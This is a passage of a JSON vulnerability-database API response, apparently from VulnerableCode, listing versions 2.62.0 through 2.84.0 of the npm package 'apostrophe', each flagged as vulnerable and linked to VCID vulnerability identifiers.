CID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.62.0"},{"url":"http://public2.vulnerablecode.io/api/packages/59492?format=json","purl":"pkg:npm/apostrophe@2.63.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.63.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268610?format=json","purl":"pkg:npm/apostrophe@2.64.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.64.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268611?format=json","purl":"pkg:npm/apostrophe@2.64.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.64.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268612?format=json","purl":"pkg:npm/apostrophe@2.65.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.65.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268613?format=json","purl":"pkg:npm/apostrophe@2.66.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.66.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268614?format=json","purl":"pkg:npm/apostrophe@2.67.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.67.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268615?format=json","purl":"pkg:npm/apostrophe@2.68.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.68.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268616?format=json","purl":"pkg:npm/apostrophe@2.68.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.68.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268617?format=json","purl":"pkg:npm/apostrophe@2.69.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.69.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268618?format=json","purl":"pkg:npm/apostrophe@2.69.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.69.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268619?format=json","purl":"pkg:npm/apostrophe@2.70.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.70.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268620?format=json","purl":"pkg:npm/apostrophe@2.70.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.70.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268621?format=json","purl":"pkg:npm/apostrophe@2.71.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.71.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268622?format=json","purl":"pkg:npm/apostrophe@2.71.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.71.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268623?format=json","purl":"pkg:npm/apostrophe@2.72.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.72.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268624?format=json","purl":"pkg:npm/apostrophe@2.72.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.72.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268625?format=json","purl":"pkg:npm/apostrophe@2.72.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.72.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268626?format=json","purl":"pkg:npm/apostrophe@2.72.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.72.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268627?format=json","purl":"pkg:npm/apostrophe@2.73.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.73.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268628?format=json","purl":"pkg:npm/apostrophe@2.74.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.74.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268629?format=json","purl":"pkg:npm/apostrophe@2.75.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.75.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268630?format=json","purl":"pkg:npm/apostrophe@2.75.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.75.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268631?format=json","purl":"pkg:npm/apostrophe@2.76.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.76.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268632?format=json","purl":"pkg:npm/apostrophe@2.76.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.76.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268633?format=json","purl":"pkg:npm/apostrophe@2.77.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.77.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268634?format=json","purl":"pkg:npm/apostrophe@2.77.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.77.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268635?format=json","purl":"pkg:npm/apostrophe@2.77.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.77.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268636?format=json","purl":"pkg:npm/apostrophe@2.78.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.78.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268637?format=json","purl":"pkg:npm/apostrophe@2.79.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.79.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268638?format=json","purl":"pkg:npm/apostrophe@2.80.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.80.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268639?format=json","purl":"pkg:npm/apostrophe@2.81.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.81.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268640?format=json","purl":"pkg:npm/apostrophe@2.81.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.81.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268641?format=json","purl":"pkg:npm/apostrophe@2.81.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.81.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268642?format=json","purl":"pkg:npm/apostrophe@2.82.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.82.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268643?format=json","purl":"pkg:npm/apostrophe@2.83.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.83.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268644?format=json","purl":"pkg:npm/apostrophe@2.83.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.83.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268645?format=json","purl":"pkg:npm/apostrophe@2.84.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerab